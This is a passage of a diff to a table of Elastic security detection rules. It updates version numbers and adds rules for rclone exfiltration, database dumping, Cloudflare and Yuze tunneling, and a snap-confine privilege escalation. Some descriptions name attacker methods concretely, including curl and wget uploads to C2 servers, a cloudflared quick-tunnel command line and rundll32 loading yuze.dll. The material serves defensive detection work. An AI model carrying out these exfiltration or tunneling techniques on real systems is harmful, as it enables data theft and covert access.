Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |316 @@ -1616,7 +1644,7 @@ and their rule type is `machine_learning`. |<> |Identifies multiple logon failures followed by a successful one from the same source address. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Windows Security Event Logs] |None |116 -|<> |Identifies multiple consecutive logon failures from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Windows Security Event Logs] |None |117 +|<> |Identifies multiple consecutive logon failures from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Windows Security Event Logs] |None |118 |<> |This rule uses alerts data to determine when multiple unique machine learning jobs involving the same influencer field are triggered. Analysts can use this to prioritize triage and response machine learning alerts. |[Use Case: Threat Detection], [Rule Type: Higher-Order Rule], [Resources: Investigation Guide], [Rule Type: Machine Learning] |None |3 @@ -1626,6 +1654,8 @@ and their rule type is `machine_learning`. |<> |Detects when a high number of Okta user authentication events are reported for multiple users in a short time frame. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Credential Access], [Resources: Investigation Guide] |None |209 +|<> |Identifies a Windows host where two or more distinct remote monitoring and management (RMM) or remote-access tool vendors are observed starting processes within the same eight-minute window. Legitimate MSP environments may run multiple tools, but this pattern can also indicate compromise, shadow IT, or attacker staging of redundant access. Processes are mapped to a single vendor label so multiple binaries from the same vendor do not inflate the count. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: CrowdStrike], [Data Source: Windows Security Event Logs], [Data Source: Elastic Endgame], [Data Source: Winlogbeat] |None |1 + |<> |Windows Credential Manager allows you to create, view, or delete saved credentials for signing into websites, connected applications, and networks. An adversary may abuse this to list or dump credentials stored in the Credential Manager for saved usernames and passwords. This may also be performed in preparation of lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Windows Security Event Logs], [Resources: Investigation Guide] |None |116 |<> |This alert identifies assets with an elevated number of vulnerabilities reported by Wiz, potentially indicating weak security posture, missed patching, or active exposure. The rule highlights assets with a high volume of distinct vulnerabilities, the presence of exploitable vulnerabilities, or a combination of multiple severities, helping prioritize assets that pose increased risk. |[Use Case: Vulnerability], [Rule Type: Higher-Order Rule], [Resources: Investigation Guide], [Data Source: Wiz] |None |2 @@ -1804,7 +1834,7 @@ and their rule type is `machine_learning`. |<> |Identifies when the Windows installer process msiexec.exe creates a new persistence entry via scheduled tasks or startup. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |5 -|<> |Identifies script engines creating files in the Startup folder, or the creation of script files in the Startup folder. Adversaries may abuse this technique to maintain persistence in an environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne] |None |315 +|<> |Identifies script engines creating files in the Startup folder, or the creation of script files in the Startup folder. Adversaries may abuse this technique to maintain persistence in an environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne] |None |316 |<> |This rule detects the creation of Pluggable Authentication Module (PAM) shared object files in unusual directories. Attackers may compile PAM shared object files in temporary directories, to move them to system directories later, potentially allowing them to maintain persistence on a compromised system, or harvest account credentials. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Persistence], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Data Source: Elastic Endgame], [Resources: Investigation Guide] |None |105 @@ -1832,9 +1862,9 @@ and their rule type is `machine_learning`. |<> |Detects potential resource exhaustion or data breach attempts by monitoring for users who consistently generate high input token counts, submit numerous requests, and receive large responses. This behavior could indicate an attempt to overload the system or extract an unusually large amount of data, possibly revealing sensitive information or causing service disruptions. |[Domain: LLM], [Data Source: AWS Bedrock], [Data Source: Amazon Web Services], [Data Source: AWS S3], [Use Case: Potential Overload], [Use Case: Resource Exhaustion], [Mitre Atlas: LLM04], [Resources: Investigation Guide] |None |7 -|<> |Identifies a user account that normally logs in with high volume from one source IP suddenly logging in from a different source IP. This pattern (one IP with many successful logons, another IP with very few) may indicate account takeover or use of stolen credentials from a new location. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Windows Security Event Logs], [Resources: Investigation Guide] |None |1 +|<> |Identifies a user account that normally logs in with high volume from one source IP suddenly logging in from a different source IP. This pattern (one IP with many successful logons, another IP with very few) may indicate account takeover or use of stolen credentials from a new location. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Windows Security Event Logs], [Resources: Investigation Guide] |None |2 -|<> |Identifies a user account (often a service account) that normally logs in with high volume using one logon type suddenly showing successful logons using a different logon type with low count. This pattern may indicate account takeover or use of stolen credentials from a new context (e.g. interactive or network logon where only batch/service was expected). |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Windows Security Event Logs], [Resources: Investigation Guide] |None |1 +|<> |Identifies a user account (often a service account) that normally logs in with high volume using one logon type suddenly showing successful logons using a different logon type with low count. This pattern may indicate account takeover or use of stolen credentials from a new context (e.g. interactive or network logon where only batch/service was expected). |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Windows Security Event Logs], [Resources: Investigation Guide] |None |2 |<> |Identifies the modification of the nTSecurityDescriptor attribute in a domain object with rights related to DCSync to a user/computer account. Attackers can use this backdoor to re-obtain access to hashes of any user/computer. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Active Directory], [Use Case: Active Directory Monitoring], [Data Source: Windows Security Event Logs], [Resources: Investigation Guide] |None |109 @@ -1898,12 +1928,16 @@ and their rule type is `machine_learning`. |<> |A machine learning job has detected data exfiltration to a particular geo-location (by region name). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. |[Use Case: Data Exfiltration Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Exfiltration], [Resources: Investigation Guide] |None |7 -|<> |Detects the use of curl to upload an archived file to an internet server. Threat actors often will collect data on a system and compress it in an archive file before exfiltrating the file back to their C2 server for review. Many threat actors have been seen utilizing curl to upload this archive file with the collected data to do this. Use of curl in this way while not inherently malicious should be considered highly abnormal and suspicious activity. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Exfiltration], [Data Source: Elastic Defend], [Resources: Investigation Guide], [Data Source: Crowdstrike], [Data Source: SentinelOne] |None |4 +|<> |Detects the use of curl to upload files to an internet server. Threat actors often will collect and exfiltrate data on a system to their C2 server for review. Many threat actors have been observed using curl to upload the collected data. Use of curl in this way, while not inherently malicious, should be considered highly abnormal and suspicious activity. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Exfiltration], [Data Source: Elastic Defend], [Resources: Investigation Guide], [Data Source: Crowdstrike], [Data Source: SentinelOne] |None |5 -|<> |Detects the use of wget to upload files to an internet server. Threat actors often will collect data on a system and attempt to exfiltrate it back to their command and control servers. Use of wget in this way, while not inherently malicious, should be considered highly abnormal and suspicious activity. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Exfiltration], [Data Source: Auditd Manager], [Data Source: Elastic Defend], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Data Source: Elastic Endgame], [Resources: Investigation Guide] |None |1 +|<> |Detects the use of wget to upload files to an internet server. Threat actors often will collect data on a system and attempt to exfiltrate it back to their command and control servers. Use of wget in this way, while not inherently malicious, should be considered highly abnormal and suspicious activity. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Exfiltration], [Data Source: Auditd Manager], [Data Source: Elastic Defend], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Data Source: Elastic Endgame], [Resources: Investigation Guide] |None |2 + +|<> |Identifies abuse of rclone (or a renamed copy, e.g. disguised as a security or backup utility) to exfiltrate data to cloud storage or remote endpoints. Rclone is a legitimate file sync tool; threat actors rename it to blend with administrative traffic and use copy/sync with cloud backends (e.g. :s3:) and include filters to exfiltrate specific file types. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Exfiltration], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Crowdstrike], [Data Source: Elastic Endgame], [Data Source: Windows Security Event Logs] |None |1 |<> |This rule looks for the usage of common data splitting utilities with specific arguments that indicate data splitting for exfiltration on Linux systems. Data splitting is a technique used by adversaries to split data into smaller parts to avoid detection and exfiltrate data. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Exfiltration], [Data Source: Elastic Defend], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Data Source: Elastic Endgame], [Resources: Investigation Guide] |None |106 +|<> |This rule detects the use of database dumping utilities to exfiltrate data from a database. Attackers may attempt to dump the database to a file on the system and then exfiltrate the file to a remote server. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Exfiltration], [Data Source: Elastic Defend], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Data Source: Elastic Endgame], [Resources: Investigation Guide] |None |1 + |<> |The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program to install Connection Manager service profiles, which accept installation information file (INF) files. Adversaries may abuse CMSTP to proxy the execution of malicious code by supplying INF files that contain malicious commands. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Rule Type: BBR], [Data Source: Sysmon], [Data Source: Elastic Endgame], [Data Source: Windows Security Event Logs] |None |109 |<> |This rule detects the creation or rename of the Doas configuration file on a Linux system. Adversaries may create or modify the Doas configuration file to elevate privileges and execute commands as other users while attempting to evade detection. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |105 @@ -1952,7 +1986,7 @@ and their rule type is `machine_learning`. |<> |This rule detects potential exploitation of CVE-2025-48384 via Git. This vulnerability allows attackers to execute arbitrary code by leveraging Git's recursive clone feature to fetch and execute malicious scripts from a remote repository. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend], [Data Source: Auditd Manager], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |1 -|<> |Through the new_terms rule type, this rule detects potential HTTP downgrade attacks by identifying HTTP traffic that uses a different HTTP version than the one typically used in the environment. An HTTP downgrade attack occurs when an attacker forces a connection via an older HTTP version, resulting in potentially less secure communication. For example, an attacker might downgrade a connection from HTTP/2 to HTTP/1.1 or HTTP/1.0 to exploit known vulnerabilities or weaknesses in the older protocol versions. |[Domain: Web], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Nginx], [Data Source: Apache], [Data Source: Apache Tomcat], [Resources: Investigation Guide] |None |1 +|<> |Through the new_terms rule type, this rule detects potential HTTP downgrade attacks by identifying HTTP traffic that uses a different HTTP version than the one typically used in the environment. An HTTP downgrade attack occurs when an attacker forces a connection via an older HTTP version, resulting in potentially less secure communication. For example, an attacker might downgrade a connection from HTTP/2 to HTTP/1.1 or HTTP/1.0 to exploit known vulnerabilities or weaknesses in the older protocol versions. |[Domain: Web], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Nginx], [Data Source: Apache], [Data Source: Apache Tomcat], [Data Source: Traefik], [Resources: Investigation Guide] |None |2 |<> |This rule detects when a process executes a command line containing hexadecimal characters. Malware authors may use hexadecimal encoding to obfuscate their payload and evade detection. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Auditd Manager], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |4 @@ -1986,7 +2020,7 @@ and their rule type is `machine_learning`. |<> |Identifies suspicious access to an LSASS handle via PssCaptureSnapShot where two successive process accesses are performed by the same process and target two different instances of LSASS. This may indicate an attempt to evade detection and dump LSASS memory for credential access. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Sysmon], [Resources: Investigation Guide] |None |313 -|<> |Identifies the creation or change of a Windows executable file over network shares. Adversaries may transfer tools or other files between systems in a compromised environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Defend] |None |111 +|<> |Identifies the creation or change of a Windows executable file over network shares. Adversaries may transfer tools or other files between systems in a compromised environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Defend] |None |112 |<> |Identifies the attempt to create a new backdoor user by setting the user's UID to 0. Attackers may alter a user's UID to 0 to establish persistence on a system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Auditd Manager], [Data Source: Crowdstrike], [Data Source: SentinelOne] |None |113 @@ -2046,7 +2080,7 @@ and their rule type is `machine_learning`. |<> |This rule identifies a potential network sweep. A network sweep is a method used by attackers to scan a target network, identifying active hosts, open ports, and available services to gather information on vulnerabilities and weaknesses. This reconnaissance helps them plan subsequent attacks and exploit potential entry points for unauthorized access, data theft, or other malicious activities. This rule defines a threshold-based approach to detect multiple connection attempts from a single host to numerous destination hosts over commonly used network services. |[Domain: Network], [Tactic: Discovery], [Tactic: Reconnaissance], [Use Case: Network Security Monitoring], [Data Source: PAN-OS], [Resources: Investigation Guide] |None |14 -|<> |Identifies a process started by Notepad after opening a Markdown file. This may indicate successful exploitation of a Notepad markdown parsing vulnerability (CVE-2026-20841) that can lead to arbitrary code execution. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |1 +|<> |Identifies a process started by Notepad after opening a Markdown file. This may indicate successful exploitation of a Notepad markdown parsing vulnerability (CVE-2026-20841) that can lead to arbitrary code execution. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |2 |<> |Detects potential brute force attacks against a single Okta user account where excessive unique device token hashes are generated, indicating automated tooling that fails to persist browser cookies between attempts. |[Domain: Identity], [Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Credential Access], [Resources: Investigation Guide] |None |210 @@ -2152,8 +2186,12 @@ and their rule type is `machine_learning`. |<> |This rule monitors for common command line flags leveraged by the Chisel client utility followed by a connection attempt. Chisel is a command-line utility used for creating and managing TCP and UDP tunnels, enabling port forwarding and secure communication between machines. Attackers can abuse the Chisel utility to establish covert communication channels, bypass network restrictions, and carry out malicious activities by creating tunnels that allow unauthorized access to internal systems. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |11 +|<> |Identifies the use of Cloudflare Tunnel (cloudflared) to expose a local service or create an outbound tunnel. Adversaries may abuse quick tunnels (e.g. tunnel --url http://127.0.0.1:80) or named tunnels to proxy C2 traffic or exfiltrate data through Cloudflare's edge while evading direct connection blocking. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Crowdstrike], [Data Source: Elastic Endgame], [Data Source: Windows Security Event Logs] |None |1 + |<> |Identifies the execution of the EarthWorm tunneler. Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection and network filtering, or to enable access to otherwise unreachable systems. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Data Source: Auditd Manager], [Resources: Investigation Guide] |None |215 +|<> |Identifies execution of Yuze, a lightweight open-source tunneling tool used for intranet penetration. Yuze supports forward and reverse SOCKS5 proxy tunneling and is typically executed via rundll32 loading yuze.dll with the RunYuze export. Threat actors may use it to proxy C2 or pivot traffic. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Crowdstrike], [Data Source: Elastic Endgame], [Data Source: Windows Security Event Logs] |None |1 + |<> |Identifies known execution traces of the REMCOS Remote Access Trojan. Remcos RAT is used by attackers to perform actions on infected machines remotely. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Windows Security Event Logs] |None |1 |<> |This rule identifies the creation of multiple files with same name and over SMB by the same user. This behavior may indicate the successful remote execution of a ransomware dropping file notes to different folders. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Defend] |None |214 @@ -2168,7 +2206,7 @@ and their rule type is `machine_learning`. |<> |Identifies the execution of the built-in Windows Installer, msiexec.exe, to install a remote package. Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |6 -|<> |Identifies attempts to install a file from a remote server using MsiExec. Adversaries may abuse Windows Installers for initial access and delivery of malware. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |1 +|<> |Identifies attempts to install a file from a remote server using MsiExec. Adversaries may abuse Windows Installers for initial access and delivery of malware. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |2 |<> |Identifies attempt to perform session hijack via COM object registry modification by setting the RunAs value to Interactive User. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Data Source: Sysmon], [Resources: Investigation Guide] |None |4 @@ -2262,6 +2300,8 @@ and their rule type is `machine_learning`. |<> |Identifies a privilege escalation attempt via exploiting CVE-2022-38028 to hijack the print spooler service execution. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |208 +|<> |This rule detects non-root file creation within "/tmp/.snap" or its host backing path "/tmp/snap-private-tmp/*/tmp/.snap", which may indicate exploitation attempts related to CVE-2026-3888. In vulnerable Ubuntu systems, the snap-confine utility normally creates the "/tmp/.snap" directory as root when initializing a snap sandbox. The vulnerability arises when systemd-tmpfiles deletes this directory after it becomes stale, allowing an unprivileged user to recreate it and populate attacker-controlled files. During subsequent snap sandbox initialization, snap-confine may bind-mount or trust these attacker-controlled paths, enabling manipulation of libraries or configuration files that can lead to local privilege escalation to root. Because legitimate creation of ".snap" directories should only be performed by root, non-root file activity in these locations is highly suspicious. This detection helps identify early stages of the exploit before privilege escalation is completed. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Use Case: Vulnerability], [Tactic: Privilege Escalation], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |1 + |<> |Detects when an attacker abuses the Multi-Factor authentication mechanism by repeatedly issuing login requests until the user eventually accepts the Okta push notification. An adversary may attempt to bypass the Okta MFA policies configured for an organization to obtain unauthorized access. |[Domain: Identity], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Data Source: Okta], [Data Source: Okta System Logs], [Resources: Investigation Guide] |None |417 |<> |This rule monitors for the execution of suspicious commands via screen and tmux. When launching a command and detaching directly, the commands will be executed in the background via its parent process. Attackers may leverage screen or tmux to execute commands while attempting to evade detection. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |110 @@ -2332,7 +2372,7 @@ and their rule type is `machine_learning`. |<> |Identifies a privilege escalation attempt via a rogue Windows directory (Windir) environment variable. This is a known primitive that is often combined with other vulnerabilities to elevate privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |313 -|<> |Identifies multiple consecutive logon failures targeting an Admin account from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Windows Security Event Logs] |None |117 +|<> |Identifies multiple consecutive logon failures targeting more than one Admin account from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Windows Security Event Logs] |None |118 |<> |This rule detects the creation of privileged containers that mount host directories into the container's filesystem. Such configurations can be exploited by attackers to escape the container isolation and gain access to the host system, potentially leading to privilege escalation and lateral movement within the environment. |[Domain: Endpoint], [Domain: Container], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Auditd Manager], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |1 @@ -2400,7 +2440,7 @@ and their rule type is `machine_learning`. |<> |Identifies registry write modifications to enable Remote Desktop Protocol (RDP) access. This could be indicative of adversary lateral movement preparation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Data Source: Crowdstrike] |None |315 -|<> |Identifies the execution of a Python script that uses the ROT cipher for letters substitution. Adversaries may use this method to encode and obfuscate part of their malicious code in legit python packages. |[Domain: Endpoint], [OS: Windows], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |4 +|<> |Identifies the execution of a Python script that uses the ROT cipher for letters substitution. Adversaries may use this method to encode and obfuscate part of their malicious code in legit python packages. |[Domain: Endpoint], [OS: Windows], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |5 |<> |This rule detects network events that may indicate the use of RPC traffic from the Internet. RPC is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector. |[Tactic: Initial Access], [Domain: Endpoint], [Use Case: Threat Detection], [Data Source: PAN-OS], [Resources: Investigation Guide] |None |108 @@ -2440,11 +2480,11 @@ and their rule type is `machine_learning`. |<> |Identifies attempts to open a remote desktop file from suspicious paths. Adversaries may abuse RDP files for initial access. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Command and Control], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |6 -|<> |Identifies the execution of a file that was created by the virtual system process. This may indicate lateral movement via network file shares. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |None |120 +|<> |Identifies the execution of a file that was created by the virtual system process. This may indicate lateral movement via network file shares. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |None |121 |<